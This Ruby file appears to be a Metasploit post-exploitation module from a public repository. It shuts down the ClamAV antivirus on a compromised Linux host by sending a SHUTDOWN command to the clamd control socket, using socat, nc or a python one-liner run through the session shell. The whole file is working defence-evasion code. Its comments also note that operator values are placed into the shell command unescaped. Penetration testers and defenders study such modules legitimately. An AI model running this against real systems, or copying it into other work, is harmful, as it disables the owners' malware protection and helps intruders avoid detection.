GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/manage/disable_clamav.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
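class MetasploitModule < Msf::Post
  Rank = ExcellentRanking
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Disable ClamAV',
        'Description' => %q{
          This module will write to the ClamAV Unix socket to shutoff ClamAV.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'DLL_Cool_J'
        ],
        'Platform' => [ 'linux' ],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),
        OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])
      ], self.class
    )
  end

  # Delivers the configured COMMAND to the clamd control socket named by
  # CLAMAV_UNIX_SOCKET through the session's shell.
  #
  # The module now stops with Failure::NoAccess when the socket path is not
  # writable for the session user (the previous version printed a warning,
  # then a contradictory success line, and ran the command anyway), and with
  # Failure::NotFound when none of the helper binaries is present.
  def run
    clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
    cmd = datastore['COMMAND']

    print_status("Checking file path #{clamav_socket} exists and is writable... ")
    # writable? is a remote test; a socket the session user cannot open
    # cannot be written to, so there is no point building a payload.
    unless writable?(clamav_socket)
      fail_with(Failure::NoAccess, 'File does NOT exist or is not writable!')
    end
    print_good('File does exist and is writable!')

    payload = build_payload(cmd, clamav_socket)
    fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!') if payload.nil?

    print_good("Sending #{cmd}...")
    cmd_exec(payload)
  end

  private

  # Returns a one-line shell command that writes +cmd+ to the Unix socket at
  # +socket_path+ using the first helper found on the target, in the order
  # socat, nc, python, python3. Returns nil when none of them exists.
  #
  # The command strings are identical to the original module's. Both values
  # are operator-supplied datastore options and are interpolated into the
  # shell line unescaped, so a value containing shell metacharacters or
  # quotes will alter the command rather than be sent literally.
  #
  # NOTE(review): the socat/nc forms send +cmd+ plus the newline that echo
  # appends, whereas the python forms send the bare string; this difference
  # is inherited from the original and has not been verified against clamd.
  def build_payload(cmd, socket_path)
    python_snippet = "import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{socket_path}'); sock.send('#{cmd}'.encode());"

    if command_exists?('socat')
      print_good('socat exists')
      "echo #{cmd} | socat - UNIX-CONNECT:#{socket_path}"
    elsif command_exists?('nc')
      print_good('nc exists')
      "echo #{cmd} | nc -U #{socket_path}"
    elsif command_exists?('python')
      print_good('python exists')
      "python -c \"#{python_snippet}\""
    elsif command_exists?('python3')
      print_good('python3 exists')
      "python3 -c \"#{python_snippet}\""
    end
  end
end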